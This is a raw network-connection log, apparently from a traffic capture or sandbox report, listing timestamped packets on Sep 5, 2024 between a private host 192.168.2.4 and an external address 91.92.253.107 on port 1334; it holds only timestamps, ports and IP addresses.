Sep 5, 2024 20:25:29.783081055 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783133030 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783140898 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783148050 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783193111 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783201933 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783205032 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783246040 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783255100 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783266068 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783377886 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783386946 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783401966 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783458948 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783467054 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783474922 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783493042 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783502102 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783531904 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783595085 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783602953 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783611059 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783621073 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783627987 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783725023 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783734083 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783740997 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783787966 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783798933 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783806086 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783869028 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783879042 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783886909 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783919096 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783958912 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783967018 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784025908 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784034967 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784041882 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784049988 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784070015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784077883 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784085989 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784096003 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784125090 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784185886 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784193993 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784235001 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784244061 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784398079 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784411907 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784420013 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784426928 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784435034 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784446955 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784454107 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784619093 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784626961 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784630060 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784636974 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784645081 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784653902 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784671068 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784678936 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784687042 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784694910 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784708977 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784717083 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784725904 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784734011 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784775019 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784784079 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784791946 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784801006 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784887075 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784895897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784903049 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784909964 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.784914017 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785013914 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785022974 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785029888 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785041094 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785048008 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785056114 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785063982 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785108089 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785115957 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785123110 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785132885 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785140038 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785150051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785156965 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785165071 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.785173893 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.827728033 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.158516884 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.159377098 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.164463043 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.166527033 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.180118084 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.184919119 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.185022116 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.185662031 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.190414906 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.531954050 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.536974907 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.536997080 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537007093 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537017107 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537030935 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.537070990 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.537106037 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537117004 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537153006 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.537250042 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537260056 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537267923 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537301064 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.537312031 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.537318945 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.537370920 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.541934967 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.541946888 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.541996002 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.542042017 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.542067051 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.542077065 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.542081118 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.542083025 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.542136908 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.583805084 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.583998919 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.627306938 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.627531052 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632610083 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632642984 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632663012 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632669926 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632673025 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632688999 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632693052 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632698059 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632725000 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632741928 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632756948 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632767916 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632805109 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632822037 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632843971 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632853031 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632893085 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632930040 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.632946968 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.632980108 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633002996 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633012056 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633018970 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633029938 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633065939 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633133888 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633142948 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633150101 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633157969 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633181095 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633193970 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633238077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633243084 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633246899 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633274078 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633320093 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633364916 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633374929 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633382082 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633467913 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.633496046 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.633538961 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.637636900 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.637676001 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.637825012 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638015032 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638024092 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638040066 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638047934 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638055086 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638063908 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638092041 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638101101 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638117075 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638164043 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638202906 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638269901 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638288975 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638346910 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638372898 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638381004 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638385057 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638391972 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638403893 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638446093 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638447046 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638458014 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638493061 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638503075 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638514996 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638520002 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638535023 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638542891 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638544083 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638561964 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638581038 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638590097 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638593912 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638632059 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638648033 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638690948 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638701916 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638710976 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638719082 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638727903 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638736010 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638747931 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638756990 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638787985 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638803959 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638834953 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638842106 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638849974 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638868093 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638910055 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638935089 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638941050 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638952017 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.638972044 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.638979912 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.639008999 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.639020920 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.639030933 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.639041901 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.639051914 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.639061928 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.639092922 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.639163017 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.639262915 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643524885 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643548965 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643579960 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643589020 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643598080 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643618107 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643627882 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643636942 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643644094 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643665075 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643703938 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643711090 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643721104 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643742085 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643749952 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643757105 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643781900 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643783092 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643790960 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643800020 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643822908 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643831968 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643835068 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643918991 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643929005 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643938065 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643942118 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643945932 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643954992 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643963099 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643971920 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643980026 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.643980026 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.643995047 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644005060 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644013882 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644016027 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644022942 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644032955 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644036055 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644045115 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644059896 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644074917 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644087076 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644093037 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644100904 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644104958 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644109964 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644120932 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644139051 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644155979 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644164085 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644186020 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644222975 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644243956 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644253016 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644260883 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644268036 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644277096 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644284010 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644298077 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644304991 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644313097 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644319057 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644370079 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644499063 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644587040 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644761086 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644793034 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644815922 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644845009 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644876957 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.644910097 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644920111 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644923925 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.644978046 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645104885 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645253897 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645344973 CEST	49733	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:31.645406961 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645417929 CEST	1334	49733	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:31.645432949 CEST	1334	49733	91.92.253.107	192.168.2.4
